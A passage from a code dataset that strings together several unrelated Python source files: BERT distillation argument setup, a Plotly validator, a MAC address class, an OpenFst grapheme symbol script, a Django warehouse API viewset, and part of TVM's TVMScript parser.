# args.encoder_checkpoint = os.path.join(MODEL_FOLDER, 'pretrained', args.bert_model, 'pytorch_model.bin')
# #logger.info('encoder checkpoint not provided, use pre-trained at %s instead' % args.encoder_checkpoint)
if args.encoder_checkpoint is None:
args.encoder_checkpoint = os.path.join(MODEL_FOLDER, 'pretrained', args.bert_model, 'pytorch_model.bin')
logger.info('encoder checkpoint not provided, use pre-trained at %s instead' % args.encoder_checkpoint)
if args.cls_checkpoint not in [None, 'None']:
args.cls_checkpoint = os.path.join(MODEL_FOLDER, args.cls_checkpoint)
# if args.kd_model == 'kd.cls':
# output_name = args.kd_model + '.' + str(args.normalize_patience) + '_' + args.task_name + '_nlayer.' + str(args.student_hidden_layers)
# else:
# output_name = args.kd_model + '_' + args.task_name + '_nlayer.' + str(args.student_hidden_layers)
# output_name += '_lr.' + str(args.learning_rate) + '_T.' + str(args.T) + '_alpha.' + str(args.alpha)
# output_name += '_beta.' + str(args.beta) + '_bs.' + str(args.train_batch_size)
if out_dir is None:
raise ValueError("Must specify the output directory where the results will be written and saved")
else:
args.output_dir = os.path.join(HOME_OUTPUT_FOLDER, args.task_name)
args.output_dir = os.path.join(args.output_dir, out_dir)
# run = 1
# while os.path.exists(args.output_dir + '-run-' + str(run)):
# if is_folder_empty(args.output_dir + '-run-' + str(run)):
# #logger.info('folder exist but empty, use it as output')
# break
# #logger.info(args.output_dir + '-run-' + str(run) + ' exist, trying next')
# run += 1
# args.output_dir += '-run-' + str(run)
os.makedirs(args.output_dir, exist_ok=True)
if load_dir is not None:
args.load_model_dir = os.path.join(HOME_OUTPUT_FOLDER, args.task_name)
args.load_model_dir = os.path.join(args.load_model_dir, load_dir)
if args.task_name == 'MNLI':
args.output_dir_mm = args.output_dir.replace('MNLI', 'MNLI-mm', 100)
os.makedirs(args.output_dir_mm, exist_ok=True)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
n_gpu = torch.cuda.device_count()
args.device = device
args.n_gpu = n_gpu
logger.info("device: {} n_gpu: {}, 16-bits training: {}".format(device, n_gpu, args.fp16))
if args.train_seed is None:
args.train_seed = random.randint(0, 100000000)
#args.seed = 50447861
#logger.info('random train seed = %d' % args.train_seed)
return args
def get_predefine_argv(args, mode='glue', task_name='RTE', train_type='kd', student_layers = 3):
"""
the function return some pre-defined arguments for argument parser
:param mode: can only be 'glue' for now
:param task_name: one of the task name under glue
:param train_type: could be 'finetune', 'kd' or 'kd.cls'
:return:
"""
if mode == 'race':
raise NotImplementedError('Please run glue for now')
elif mode == 'glue':
argv = [
'--task_name', task_name,
'--bert_model', 'bert-base-uncased',
'--max_seq_length', '128',
'--train_batch_size', '64',
'--learning_rate', '2e-5',
'--num_train_epochs', '6',
'--eval_batch_size', '32',
'--gradient_accumulation_steps', '1',
'--log_every_step', '1',
'--do_train', 'True',
'--do_eval', 'True',
'--fp16', 'False',
]
if train_type == 'ft':
argv += [
'--student_hidden_layers', str(student_layers),
'--train_batch_size', '64',
'--kd_model', 'kd',
'--alpha', '0.0', # alpha = 0 is equivalent to fine-tuning for KD
]
if train_type == 'finetune_student':
argv += [
'--student_hidden_layers', str(student_layers),
'--kd_model', 'kd',
'--alpha', '0.0',
]
elif train_type == 'kd':
teacher_pred = HOME_OUTPUT_FOLDER+f'/{task_name}/{task_name}_patient_kd_teacher_12layer_result_summary.pkl'
argv += [
'--student_hidden_layers', str(student_layers),
'--kd_model', 'kd',
'--alpha', '0.7',
'--T', '10',
'--teacher_prediction', teacher_pred,
]
elif train_type == 'pkd':
teacher_pred = HOME_OUTPUT_FOLDER+f'/{task_name}/{task_name}_patient_kd_teacher_12layer_result_summary.pkl'
argv += [
'--student_hidden_layers', str(student_layers),
'--kd_model', 'kd.cls',
'--alpha', '0.7',
'--beta', '100',
'--T', '10',
'--teacher_prediction',
teacher_pred,
'--fc_layer_idx', '1,3,5,7,9', # this for pkd-skip
'--normalize_patience', 'True',
]
else:
raise NotImplementedError('training mode %s has not been implemented yet' % mode)
return argv
|
the-stack_106_16949
|
import _plotly_utils.basevalidators
class RangeValidator(_plotly_utils.basevalidators.InfoArrayValidator):
def __init__(
self, plotly_name='range', parent_name='layout.scene.yaxis', **kwargs
):
super(RangeValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
anim=kwargs.pop('anim', False),
edit_type=kwargs.pop('edit_type', 'plot'),
implied_edits=kwargs.pop('implied_edits', {'autorange': False}),
items=kwargs.pop(
'items', [
{
'valType': 'any',
'editType': 'plot',
'impliedEdits': {
'^autorange': False
}
},
{
'valType': 'any',
'editType': 'plot',
'impliedEdits': {
'^autorange': False
}
}
]
),
role=kwargs.pop('role', 'info'),
**kwargs
)
|
the-stack_106_16950
|
#!/usr/bin/env python3
#
# Copyright (c) 2016 Roberto Riggio
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""EmPOWER EtherAddress Class."""
class EtherAddress:
"""An Ethernet (MAC) address type."""
def __init__(self, addr="00:00:00:00:00:00"):
"""
Understands Ethernet address is various forms. Hex strings, raw bytes
strings, etc.
"""
# Always stores as a 6 character string
if isinstance(addr, bytes) and len(addr) == 6:
# raw
self._value = addr
elif isinstance(addr, str):
if len(addr) == 17 or addr.count(':') == 5:
# hex
if len(addr) == 17:
if addr[2::3] != ':::::' and addr[2::3] != '-----':
raise RuntimeError("Bad format for ethernet address")
# Address of form xx:xx:xx:xx:xx:xx
# Pick out the hex digits only
addr = ''.join(
(addr[x * 3:x * 3 + 2] for x in range(0, 6)))
else:
# Assume it's hex digits but they may not all be in
# two-digit groupings (e.g., xx:x:x:xx:x:x). This actually
# comes up.
addr = ''.join(["%02x" % (int(x, 16),)
for x in addr.split(":")])
# We should now have 12 hex digits (xxxxxxxxxxxx).
# Convert to 6 raw bytes.
addr = b''.join(bytes((int(addr[x * 2:x * 2 + 2], 16),))
for x in range(0, 6))
else:
raise ValueError("Expected 6 raw bytes or some hex")
self._value = addr
elif isinstance(addr, EtherAddress):
self._value = addr.to_raw()
elif addr is None:
self._value = b'\x00' * 6
else:
raise ValueError("EtherAddress must be a string of 6 raw bytes")
def is_global(self):
"""
Returns True if this is a globally unique (OUI enforced) address.
"""
return not self.is_local()
def is_local(self):
"""
Returns True if this is a locally-administered (non-global) address.
"""
return True if (self._value[0] & 2) else False
def is_multicast(self):
"""
Returns True if this is a multicast address.
"""
return True if (self._value[0] & 1) else False
def to_raw(self):
"""
Returns the address as a 6-long bytes object.
"""
return self._value
def to_tuple(self):
"""
Returns a 6-entry long tuple where each entry is the numeric value
of the corresponding byte of the address.
"""
return tuple((x for x in self._value))
def to_str(self, separator=':'):
"""
Returns the address as string consisting of 12 hex chars separated
by separator.
"""
return separator.join(('%02x' % (x,) for x in self._value)).upper()
def to_int(self, separator=':'):
"""
Returns the address as string consisting of 12 hex chars separated
by separator.
"""
return int(self.to_str().replace(separator, ""), 16)
def match(self, other):
""" Bitwise match. """
if isinstance(other, EtherAddress):
other = other.to_raw()
elif isinstance(other, bytes):
pass
else:
try:
other = EtherAddress(other).to_raw()
except RuntimeError:
return False
for cnt in range(0, 6):
if (self._value[cnt] & other[cnt]) != self._value[cnt]:
return False
return True
def __str__(self):
return self.to_str()
def __eq__(self, other):
if isinstance(other, EtherAddress):
other = other.to_raw()
elif isinstance(other, bytes):
pass
else:
try:
other = EtherAddress(other).to_raw()
except RuntimeError:
return False
if self._value == other:
return True
return False
def __hash__(self):
return self._value.__hash__()
def __repr__(self):
return self.__class__.__name__ + "('" + self.to_str() + "')"
def __setattr__(self, a, v):
if hasattr(self, '_value'):
raise TypeError("This object is immutable")
object.__setattr__(self, a, v)
@classmethod
def bcast(cls):
""" Return a broadcast address. """
return EtherAddress('ff:ff:ff:ff:ff:ff')
|
the-stack_106_16952
|
# Copyright 2017 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Writes OpenFst SymbolTable for unified Indic graphemes.
"""
from __future__ import unicode_literals
import sys
from mul_034 import script_util
def main(argv):
if len(argv) == 1:
display_file = 'display_grapheme.syms'
grapheme_file = 'grapheme.syms'
elif len(argv) == 3:
display_file = argv[1]
grapheme_file = argv[2]
else:
sys.stderr.write(
'Usage: make_grapheme_syms [display_grapheme.syms grapheme.syms]\n')
sys.exit(2)
data = list(script_util.ReadGraphemeDataDefault())
display_graphemes = [(display, label) for (display, _, _, label) in data]
graphemes = [(grapheme, label) for (_, grapheme, _, label) in data]
success = script_util.IsBijectiveMapping(display_graphemes)
success &= script_util.IsBijectiveMapping(graphemes)
if not success:
sys.exit(1)
script_util.SymbolsToFile(display_file, display_graphemes)
script_util.SymbolsToFile(grapheme_file, graphemes)
return
if __name__ == '__main__':
main(sys.argv)
|
the-stack_106_16954
|
from rest_framework import viewsets
from .models import ListModel
from . import serializers
from utils.page import MyPageNumberPagination
from rest_framework.filters import OrderingFilter
from django_filters.rest_framework import DjangoFilterBackend
from rest_framework.response import Response
from .filter import Filter
from rest_framework.exceptions import APIException
class APIViewSet(viewsets.ModelViewSet):
"""
retrieve:
Response a data list(get)
list:
Response a data list(all)
create:
Create a data line(post)
delete:
Delete a data line(delete)
partial_update:
Partial_update a data(patch:partial_update)
update:
Update a data(put:update)
"""
pagination_class = MyPageNumberPagination
filter_backends = [DjangoFilterBackend, OrderingFilter, ]
ordering_fields = ['id', "create_time", "update_time", ]
filter_class = Filter
def get_project(self):
try:
id = self.kwargs.get('pk')
return id
except:
return None
def get_queryset(self):
id = self.get_project()
if self.request.user:
if id is None:
return ListModel.objects.filter(openid=self.request.auth.openid, is_delete=False)
else:
return ListModel.objects.filter(openid=self.request.auth.openid, id=id, is_delete=False)
else:
return ListModel.objects.none()
def get_serializer_class(self):
if self.action in ['list', 'retrieve', 'destroy']:
return serializers.WarehouseGetSerializer
elif self.action in ['create']:
return serializers.WarehousePostSerializer
elif self.action in ['update']:
return serializers.WarehouseUpdateSerializer
elif self.action in ['partial_update']:
return serializers.WarehousePartialUpdateSerializer
else:
return self.http_method_not_allowed(request=self.request)
def create(self, request, *args, **kwargs):
data = self.request.data
data['openid'] = self.request.auth.openid
if ListModel.objects.filter(openid=data['openid'], warehouse_name=data['warehouse_name'], is_delete=False).exists():
raise APIException({"detail": "Data Exists"})
else:
if ListModel.objects.filter(openid=data['openid'], is_delete=False).count() >= 1:
raise APIException({"detail": "You Just Can Add 1 Warehouse"})
else:
serializer = self.get_serializer(data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def update(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot update data which not yours"})
else:
data = self.request.data
serializer = self.get_serializer(qs, data=data)
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def partial_update(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot partial_update data which not yours"})
else:
data = self.request.data
serializer = self.get_serializer(qs, data=data, partial=True)
serializer.is_valid(raise_exception=True)
serializer.save()
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
def destroy(self, request, pk):
qs = self.get_object()
if qs.openid != self.request.auth.openid:
raise APIException({"detail": "Cannot delete data which not yours"})
else:
qs.is_delete = True
qs.save()
serializer = self.get_serializer(qs, many=False)
headers = self.get_success_headers(serializer.data)
return Response(serializer.data, status=200, headers=headers)
|
the-stack_106_16957
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""TVM Script Parser For TIR
We use [synr](https://synr.readthedocs.io) to get an AST that is stable over
different python versions. Synr also provides an error handling context that we
use for error reporting.
"""
# pylint: disable=invalid-name, inconsistent-return-statements, no-else-return
import json
import operator
import inspect
from typing import Any, Callable, Dict, List, Optional, Union
from synr import ast, Transformer, to_ast
import tvm
from tvm import IRModule, relax
from tvm._ffi.base import TVMError
from tvm.ir import GlobalVar
from tvm.ir.function import BaseFunc
from tvm.tir import buffer
from tvm.tir.function import PrimFunc
from . import _ffi_api
from . import tir
from .context_maintainer import ContextMaintainer
from .meta_unparser import MetaUnparser
from .registry import Registry
from .diagnostics import TVMDiagnosticCtx
from .utils import tvm_span_from_synr, synr_span_from_tvm, call_with_error_reporting
from .tir.intrin import Intrin
from .tir.node import Slice, BufferSlice
from .tir.scope_handler import ScopeHandler, WithScopeHandler, ForScopeHandler
from .tir.special_stmt import SpecialStmt
from .tir import ty
class CallArgumentReader(object):
"""Helper class to read required arguments from passed arguments.
When parsing a function call, we need to match the arguments provided in
the AST to the required arguments of the function. This class makes sure
all the positional arguments are filled and also fill keyword arguments
with thier default value if a different value was not provided.
"""
def __init__(self, func_name, args, kwargs, parser, node):
self.func_name = func_name
self.args = args
self.kwargs = kwargs
self.parser = parser
self.node = node
def get_pos_only_arg(self, pos, name):
"""Get corresponding position only function argument from argument list"""
if len(self.args) >= pos:
arg = self.args[pos - 1]
elif name not in self.kwargs:
# If no positional argument was found in the AST, we see if it was
# defined by name instead.
# TODO(tkonolige): this error message is not quite correct. The
# number of required arguments is >= pos
self.parser.report_error(
f"{self.func_name} requires {pos} arguments, but only {len(self.args)} were given.",
self.node.span,
)
else:
arg = self.kwargs[name]
return arg
def get_kwarg(self, pos, name, default):
"""Get corresponding keyword function argument from argument list.
If the user hasn't provided the argument, set it to the default value.
"""
if len(self.args) >= pos:
arg = self.args[pos - 1]
elif name in self.kwargs:
arg = self.kwargs[name]
else:
return default
return arg
def get_varargs(self, pos):
"""Get corresponding variable argument from argument list"""
if len(self.args) >= pos and len(self.kwargs) == 0:
return self.args[pos - 1 :]
return []
class TVMScriptParser(Transformer):
"""Synr AST visitor pass which finally lowers to TIR.
Notes for Extension
-------------------
1. To support a new type of AST node, add a function transform_xxx().
2. To support new functions, add the function to the appropriate registry:
We divide allowed function calls in TVM script into 3 categories,
intrin, scope_handler and special_stmt.
1. intrin functions are low level functions like mod, load, and
constants. They correspond to a tir `IRNode`. They must have a
return value. The user can register intrin functions for the parser to
use.
2. scope_handler functions have no return value. They take two
arguments: the parser and the AST node. scope_handler functions are
used in with and for statements.
3. special_stmt functions handle cases that do not have a corresponding
tir `IRNode`. These functions take the parser and the AST node as
arguments and may return a value.
When visiting a Call node, we check the special_stmt registry first. If
no registered function is found, we then check the intrin registry.
When visiting With node, we check the with_scope registry.
When visiting For node, we check the for_scope registry.
"""
_binop_maker = {
ast.BuiltinOp.Add: tvm.tir.Add,
ast.BuiltinOp.Sub: tvm.tir.Sub,
ast.BuiltinOp.Mul: tvm.tir.Mul,
ast.BuiltinOp.Div: tvm.tir.Div,
ast.BuiltinOp.FloorDiv: tvm.tir.FloorDiv,
ast.BuiltinOp.Mod: tvm.tir.FloorMod,
ast.BuiltinOp.BitOr: lambda lhs, rhs, span: operator.or_(lhs, rhs),
ast.BuiltinOp.BitAnd: lambda lhs, rhs, span: operator.and_(lhs, rhs),
ast.BuiltinOp.BitXor: lambda lhs, rhs, span: operator.xor(lhs, rhs),
ast.BuiltinOp.GT: tvm.tir.GT,
ast.BuiltinOp.GE: tvm.tir.GE,
ast.BuiltinOp.LT: tvm.tir.LT,
ast.BuiltinOp.LE: tvm.tir.LE,
ast.BuiltinOp.Eq: tvm.tir.EQ,
ast.BuiltinOp.NotEq: tvm.tir.NE,
ast.BuiltinOp.And: tvm.tir.And,
ast.BuiltinOp.Or: tvm.tir.Or,
}
_unaryop_maker = {
ast.BuiltinOp.USub: lambda rhs, span: operator.neg(rhs),
ast.BuiltinOp.Invert: lambda rhs, span: operator.invert(rhs),
ast.BuiltinOp.Not: tvm.tir.Not,
}
# pylint gets confused here with synr.Transformer which doesn't have a
# custom init, so just disable it
def __init__(self, base_lineno, tir_namespace): # pylint: disable=super-init-not-called
self.context = None
self.base_lineno = base_lineno
self.current_lineno = 0
self.current_col_offset = 0
self.tir_namespace = tir_namespace
self.meta = None
def init_function_parsing_env(self):
"""Initialize function parsing environment"""
self.context = ContextMaintainer(self.report_error) # scope emitter
def init_meta(self, meta_dict):
if meta_dict is not None:
self.meta = tvm.ir.load_json(json.dumps(meta_dict))
def transform(self, node):
"""Generic transformation for visiting the AST. Dispatches to
`transform_ClassName` for the appropriate ClassName."""
old_lineno, old_col_offset = self.current_lineno, self.current_col_offset
if hasattr(node, "lineno"):
self.current_lineno = self.base_lineno + node.lineno - 1
if hasattr(node, "col_offset"):
self.current_col_offset = node.col_offset
method = "transform_" + node.__class__.__name__
visitor = getattr(self, method, self.generic_visit)
transform_res = visitor(node)
self.current_lineno, self.current_col_offset = old_lineno, old_col_offset
return transform_res
def match_tir_namespace(self, identifier: str) -> bool:
"""Check if the namespace is equal to tvm.script.tir"""
return identifier in self.tir_namespace
def report_error(self, message: str, span: Union[ast.Span, tvm.ir.Span]):
"""Report an error occuring at a location.
This just dispatches to synr's DiagnosticContext.
Parameters
----------
message : str
Error message
span : Union[synr.ast.Span, tvm.ir.Span】
Location of the error
"""
if isinstance(span, tvm.ir.Span):
span = synr_span_from_tvm(span)
self.error(message, span)
def parse_body(self, parent):
"""Parse remaining statements in this scope.
Parameters
----------
parent : synr.ast.Node
Parent node of this scope. Errors will be reported here.
"""
body = []
spans = []
stmt = parent
while len(self.context.node_stack[-1]) > 0:
stmt = self.context.node_stack[-1].pop()
spans.append(stmt.span)
res = self.transform(stmt)
if res is not None:
body.append(res)
if len(body) == 0:
self.report_error(
"Expected another statement at the end of this block. Perhaps you "
"used a concise statement and forgot to include a body afterwards.",
stmt.span,
)
else:
return (
tvm.tir.SeqStmt(body, tvm_span_from_synr(ast.Span.union(spans)))
if len(body) > 1
else body[0]
)
def parse_arg_list(self, func, node_call):
"""Match the arguments of a function call in the AST to the required
arguments of the function. This handles positional arguments,
positional arguments specified by name, keyword arguments, and varargs.
Parameters
----------
func : Function
The function that provides the signature
node_call: Union[ast.Call, ast.TypeApply, ast.TypeCall]
The AST call node that calls into the function.
Returns
-------
arg_list : list
The parsed positional argument.
"""
assert isinstance(node_call, (ast.Call, ast.TypeApply, ast.TypeCall))
# collect arguments
args = [self.transform(arg) for arg in node_call.params]
if isinstance(node_call, ast.TypeApply):
kw_args = {} # TypeApply (e.g. foo[bar]) doesn't have kwargs defined in synr
else:
kw_args = {
self.transform(k): self.transform(v) for k, v in node_call.keyword_params.items()
}
# get the name and parameter list of func
if isinstance(func, (Intrin, ScopeHandler, SpecialStmt)):
func_name, param_list = func.signature()
else:
self.report_error(
"Internal Error: function must be of type Intrin, ScopeHandler or SpecialStmt, "
f"but it is {type(func).__name__}",
node_call.span,
)
# check arguments and parameter list and get a list of arguments
reader = CallArgumentReader(func_name, args, kw_args, self, node_call)
pos_only, kwargs, varargs = param_list
internal_args = list()
for i, arg_name in enumerate(pos_only):
internal_args.append(reader.get_pos_only_arg(i + 1, arg_name))
for i, arg_info in enumerate(kwargs):
arg_name, default = arg_info
internal_args.append(reader.get_kwarg(i + 1 + len(pos_only), arg_name, default=default))
if varargs is not None:
internal_args.extend(reader.get_varargs(len(pos_only) + len(kwargs) + 1))
elif len(args) + len(kw_args) > len(pos_only) + len(kwargs):
self.report_error(
"Arguments mismatched. "
+ f"Expected {len(pos_only) + len(kwargs)} args but got "
+ f"{len(args) + len(kw_args)}",
node_call.span,
)
return internal_args
def parse_type(self, type_node, parent):
"""Parse a type annotation.
We require the parent object to the type so that we have a place to
report the error message if the type does not exist.
"""
if type_node is None:
self.report_error("A type annotation is required", parent.span)
res_type = self.transform(type_node)
return tvm.ir.TupleType([]) if res_type is None else res_type.evaluate()
def generic_visit(self, node):
"""Fallback visitor if node type is not handled. Reports an error."""
self.report_error(type(node).__name__ + " AST node is not supported", node.span)
def transform_Module(self, node):
"""Module visitor
Right now, we only support two formats for TVM Script.
Example
-------
1. Generate a PrimFunc (If the code is printed, then it may also contain metadata)
.. code-block:: python
import tvm
@tvm.script
def A(...):
...
# returns a PrimFunc
func = A
2. Generate an IRModule
.. code-block:: python
import tvm
@tvm.script.ir_module
class MyMod():
@T.prim_func
def A(...):
...
@T.prim_func
def B(...):
...
__tvm_meta__ = ...
# returns an IRModule
mod = MyMod
"""
if len(node.funcs) == 1:
return self.transform(next(iter(node.funcs.values())))
elif len(node.func) == 0:
self.report_error(
"You must supply at least one class or function definition", node.span
)
else:
self.report_error(
"Only one-function, one-class or function-with-meta source code is allowed",
ast.Span.union([x.span for x in list(node.funcs.values())[1:]]),
)
def transform_Class(self, node):
"""Class definition visitor.
A class can have multiple function definitions and a single
:code:`__tvm_meta__` statement. Each class corresponds to a single
:code:`IRModule`.
Example
-------
.. code-block:: python
@tvm.script.ir_module
class MyClass:
__tvm_meta__ = {}
def A():
T.evaluate(0)
"""
if len(node.assignments) == 1:
if not (
len(node.assignments[0].lhs) == 1
and isinstance(node.assignments[0].lhs[0], ast.Var)
and node.assignments[0].lhs[0].id.name == "__tvm_meta__"
):
self.report_error(
"The only top level assignments allowed are `__tvm_meta__ = ...`",
node.assignments[0].span,
)
self.init_meta(
MetaUnparser().do_transform(node.assignments[0].rhs, self._diagnostic_context)
)
elif len(node.assignments) > 1:
self.report_error(
"Only a single top level `__tvm_meta__` is allowed",
ast.Span.union([x.span for x in node.assignments[1:]]),
)
return IRModule(
{GlobalVar(name): self.transform(func) for name, func in node.funcs.items()}
)
def transform_Function(self, node):
"""Function definition visitor.
Each function definition is translated to a single :code:`PrimFunc`.
There are a couple restrictions on TVM Script functions:
1. Function arguments must have their types specified.
2. The body of the function can contain :code:`func_attr` to specify
attributes of the function (like it's name).
3. The body of the function can also contain multiple :code:`buffer_bind`s,
which give shape and dtype information to arguments.
4. Return statements are implicit.
Example
-------
.. code-block:: python
@T.prim_func
def my_function(x: T.handle): # 1. Argument types
T.func_attr({"global_symbol": "mmult"}) # 2. Function attributes
X_1 = tir.buffer_bind(x, [1024, 1024]) # 3. Buffer binding
T.evaluate(0) # 4. This function returns 0
"""
def check_decorator(decorators: List[ast.Expr]) -> bool:
"""Check the decorator is `T.prim_func"""
if len(decorators) != 1:
return False
d: ast.Expr = decorators[0]
return (
isinstance(d, ast.Attr)
and isinstance(d.object, ast.Var)
and self.match_tir_namespace(d.object.id.name)
and d.field.name == "prim_func"
)
self.init_function_parsing_env()
self.context.enter_scope(nodes=node.body.stmts)
# add parameters of function
for arg in node.params:
# Note that this case is for T.match_buffer syntax sugar
if isinstance(arg.ty, (ast.TypeCall, ast.TypeApply)) and isinstance(
self.transform(arg.ty.func_name), ty.GenericBufferType
):
result = self.handle_match_buffer_type(arg.ty, arg.name)
if not isinstance(result, buffer.Buffer):
self.report_error(
"The result type of evaluating TypeCall and TypeApply stmt"
f" is wrong: {type(result)}. It should be a Buffer",
node.span,
)
arg_name_with_handle = arg.name + "_handle"
arg_var = tvm.te.var(arg_name_with_handle, tvm.ir.PrimType("handle"))
self.context.func_buffer_map[arg_var] = result
self.context.update_symbol(arg.name, result, node)
else:
arg_var = tvm.te.var(arg.name, self.parse_type(arg.ty, arg))
self.context.update_symbol(arg.name, arg_var, node)
self.context.func_params.append(arg_var)
if not check_decorator(node.decorators):
self.report_error(
"All functions should be decorated by `T.prim_func`",
node.span,
)
# fetch the body of root block
body = self.parse_body(node.body)
# return a tir.PrimFunc
dict_attr = self.context.func_dict_attr
ret_type = self.parse_type(node.ret_type, node) if node.ret_type is not None else None
func = tvm.tir.PrimFunc(
self.context.func_params,
body,
ret_type,
buffer_map=self.context.func_buffer_map,
attrs=tvm.ir.make_node("DictAttrs", **dict_attr) if dict_attr else None,
span=tvm_span_from_synr(node.span),
)
# New Scope : Implicit root block
# Each function contains an implicit root block in TensorIR,
# so here we need a block scope for it.
# If the PrimFunc is not a TensorIR func (e.g. TE scheduled func or low-level func),
# the root block will not be added. The logic to add root block is in `_ffi_api.Complete`
# Fix the PrimFunc
# 1. generate root block if necessary
# 2. generate surrounding loops for blocks if necessary
func = call_with_error_reporting(
self.report_error,
node.span,
_ffi_api.Complete,
func,
self.context.root_alloc_buffers,
)
self.context.exit_scope()
return func
def transform_Lambda(self, node):
"""Lambda visitor
Return an array of input parameters and the transformed lambda body.
"""
self.context.enter_scope(nodes=[node.body])
# add parameters of the lambda
arg_vars = []
for arg in node.params:
arg_var = tvm.te.var(arg.name)
arg_vars.append(arg_var)
self.context.update_symbol(arg.name, arg_var, node)
# the body of a lambda must be an expr
if not isinstance(node.body, ast.Expr):
self.report_error("The body of a lambda must be an expression", node.span)
# transform the body of the lambda
body = self.transform(node.body)
self.context.exit_scope()
return arg_vars, body
def transform_Assign(self, node):
"""Assign visitor
AST abstract grammar:
Assign(expr* targets, expr value, string? type_comment)
By now 3 patterns of Assign is supported:
1. special stmts with return value
1.1 Buffer = T.match_buffer()/T.buffer_decl()
1.2 Var = T.var()
1.3 Var = T.env_thread()
2. (BufferStore) Buffer[PrimExpr, PrimExpr, ..., PrimExpr] = PrimExpr
3. (Store) Var[PrimExpr] = PrimExpr
4. with scope handlers with concise scoping and var def
4.1 var = T.allocate()
"""
if isinstance(node.rhs, ast.Call):
# Pattern 1 & Pattern 4
func = self.transform(node.rhs.func_name)
if isinstance(func, WithScopeHandler):
if not func.concise_scope or not func.def_symbol:
self.report_error(
"with scope handler " + func.signature()[0] + " is not suitable here",
node.rhs.span,
)
# Pattern 4
arg_list = self.parse_arg_list(func, node.rhs)
func.enter_scope(node, self.context, arg_list, node.rhs.func_name.span)
func.body = self.parse_body(node)
return func.exit_scope(node, self.context, arg_list, node.rhs.func_name.span)
elif isinstance(func, SpecialStmt):
# Pattern 1
arg_list = self.parse_arg_list(func, node.rhs)
func.handle(node, self.context, arg_list, node.rhs.func_name.span)
return self.parse_body(node)
else:
value = self.transform(node.rhs)
if len(node.lhs) == 1 and not isinstance(node.lhs[0], ast.Var):
# This is a little confusing because it only is true when
# we have taken this branch. We might need to clarify what
# exectly is allowed in Assignments in tvmscript.
self.report_error(
"Left hand side of assignment must be an unqualified variable",
node.span,
)
ast_var = node.lhs[0]
var = tvm.te.var(
ast_var.id.name,
self.parse_type(node.ty, ast_var),
span=tvm_span_from_synr(ast_var.span),
)
self.context.update_symbol(var.name, var, node)
body = self.parse_body(node)
self.context.remove_symbol(var.name)
return tvm.tir.LetStmt(var, value, body, span=tvm_span_from_synr(node.span))
self.report_error(
"""Assignments should be either
1. A "special statement" with return value
1.1 Buffer = T.match_buffer()/T.buffer_decl()
1.2 Var = T.var()
1.3 Var = T.env_thread()
2. A store into a buffer: Buffer[PrimExpr, PrimExpr, ..., PrimExpr] = PrimExpr
3. A store into a variable: Var[PrimExpr] = PrimExpr
4. A with scope handler with concise scoping and var def
4.1 var = T.allocate()""",
node.span,
)
def transform_SubscriptAssign(self, node):
"""Visitor for statements of the form :code:`x[1] = 2`."""
symbol = self.transform(node.params[0])
indexes = self.transform(node.params[1])
rhs = self.transform(node.params[2])
rhs_span = tvm_span_from_synr(node.params[2].span)
if isinstance(symbol, tvm.tir.Buffer):
# BufferStore
return tvm.tir.BufferStore(
symbol,
tvm.runtime.convert(rhs, span=rhs_span),
indexes,
span=tvm_span_from_synr(node.span),
)
else:
if symbol.dtype == "handle" and len(indexes) != 1:
self.report_error(
"Handles only support one-dimensional indexing. Use `T.match_buffer` to "
"construct a multidimensional buffer from a handle.",
node.params[0].span,
)
if len(indexes) != 1:
self.report_error(
f"Store is only allowed with one index, but {len(indexes)} were provided.",
node.params[1].span,
)
# Store
return tvm.tir.Store(
symbol,
tvm.runtime.convert(rhs, span=rhs_span),
indexes[0],
tvm.runtime.convert(True, span=tvm_span_from_synr(node.span)),
span=tvm_span_from_synr(node.span),
)
def transform_Assert(self, node):
"""Assert visitor
Pattern corresponds to concise mode of :code:`with T.Assert()`.
"""
condition = self.transform(node.condition)
if node.msg is None:
self.report_error("Assert statements must have an error message.", node.span)
message = self.transform(node.msg)
body = self.parse_body(node)
return tvm.tir.AssertStmt(
condition, tvm.runtime.convert(message), body, span=tvm_span_from_synr(node.span)
)
def transform_For(self, node):
"""For visitor
AST abstract grammar:
For(expr target, expr iter, stmt* body, stmt* orelse, string? type_comment)
By now 1 pattern of For is supported:
1. for scope handler
for name in T.serial()/T.parallel()/T.vectorized()/T.unroll()/range()/
T.grid()/T.thread_binding()
"""
if not isinstance(node.rhs, ast.Call):
self.report_error("The loop iterator should be a function call.", node.rhs.span)
func = self.transform(node.rhs.func_name)
if not isinstance(func, ForScopeHandler):
self.report_error(
"Only For scope handlers can be used in a for statement.", node.rhs.func_name.span
)
# prepare for new for scope
old_lineno, old_col_offset = self.current_lineno, self.current_col_offset
self.current_lineno = node.span.start_line
